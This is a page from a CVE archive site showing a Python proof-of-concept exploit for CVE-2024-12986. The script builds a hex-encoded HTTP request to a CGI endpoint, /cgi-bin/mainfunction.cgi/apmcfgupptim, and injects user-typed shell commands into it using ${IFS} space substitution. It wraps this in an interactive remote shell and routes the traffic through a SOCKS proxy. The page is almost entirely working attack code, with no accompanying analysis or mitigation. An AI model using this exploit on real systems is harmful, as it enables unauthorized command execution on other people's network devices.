4837 Total CVEs
26 Years
GitHub
Home / 2024 / CVE-2024-12986
README.md
README.md not found for CVE-2024-12986. The file may not exist in the repository.
POC / exploit.py PY
⬇ Raw GitHub ✕ Close 
import socket
import socks

# Predefined host and port
HOST = 'host'
PORT = 'port'

# ANSI escape sequences for color
RESET = "\033[0m"
GREEN = "\033[92m"
RED = "\033[91m"
BLUE = "\033[94m"
CYAN = "\033[96m"
YELLOW = "\033[93m"

def send_http_request(host_ip, host_port, request):
    """Sends the crafted HTTP request to the specified host and port."""
    socket.socket = socks.socksocket
    try:
        print(f"{CYAN}Connecting to {host_ip}:{host_port}...{RESET}")
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(10)
            s.connect((host_ip, host_port))
            
            # Convert the request to binary
            request = bytes.fromhex(request.decode())
            print(f"{GREEN}Sending HTTP request...{RESET}")
            s.sendall(request)
            print(f"{GREEN}HTTP request sent successfully!{RESET}")
            
            response = b""
            while True:
                data = s.recv(4096)
                if not data:
                    break
                response += data
            
            return response.decode('utf-8', errors='replace')
    except Exception as e:
        print(f"{RED}An error occurred: {e}{RESET}")
        return None

def start_shell():
    """Starts an interactive shell to accept commands."""
    print(f"{BLUE}{'=' * 50}{RESET}")
    print(f"{YELLOW}Interactive Shell Started{RESET}")
    print(f"{YELLOW}Type your commands below. Type 'exit' to quit.{RESET}")
    print(f"{BLUE}{'=' * 50}{RESET}")
    
    while True:
        command = input(f"{CYAN}shell>{RESET} ")
        if command.lower() == 'exit':
            print(f"{YELLOW}Exiting the shell. Goodbye!{RESET}")
            break

        # Replace spaces with ${IFS} for compatibility
        command_with_ifs = command.replace(" ", "${IFS}")
        payload_binary = (
            b'474554202f6367692d62696e2f6d61696e66756e6374696f6e2e6367692f61706d63666775707074696d3f73657373696f6e3d7878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787830b425353224632535322463'
            + command_with_ifs.encode().hex().encode()
            + b'20485454502f312e300d0a0d0a'
        )

        # Send the crafted payload
        response = send_http_request(HOST, PORT, payload_binary)

        # Display the response
        if response:
            print(f"{BLUE}{'=' * 50}{RESET}")
            print(f"{GREEN}HTTP response received:{RESET}")
            print(f"{BLUE}{'=' * 50}{RESET}")
            print(response)
            print(f"{BLUE}{'=' * 50}{RESET}")
        else:
            print(f"{RED}No response received. Please check the host, port, or payload.{RESET}")

if __name__ == "__main__":
    try:
        start_shell()
    except KeyboardInterrupt:
        print(f"\n{YELLOW}Shell interrupted. Goodbye!{RESET}")